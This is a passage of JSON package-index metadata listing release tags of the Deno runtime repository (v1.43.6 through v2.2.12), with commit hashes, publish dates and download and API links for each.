at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ec